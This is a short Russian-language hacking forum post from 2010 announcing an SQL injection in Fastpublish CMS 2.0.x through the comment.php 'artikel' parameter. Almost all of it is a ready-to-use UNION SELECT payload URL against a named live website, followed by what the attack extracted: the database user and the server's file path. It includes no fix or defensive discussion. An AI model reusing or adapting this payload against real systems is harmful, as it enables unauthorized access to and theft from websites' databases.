23.10.2010, 03:46
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Fastpublish CMS 2.0.x
SQL injection
/aufbau/comment.php
Пример:
Код:
Code:
http://www.fastpublish.de/aufbau/comment.php?artikel=106' limit 0 union select 1,0x6465,3,4,5,6,7,8,9,version(),11,12,13,14,15,16 ,17,18,19,0x434d53,21 --+1&popup=true
Путь+USER: http://www.fastpublish.de/aufbau/comment.php?artikel=106
Код:
Code:
wwwrun@localhost
Код:
/www/htdocs/w0081419/Original_Neu/aufbau/comment.php
[/COLOR]
|
|
|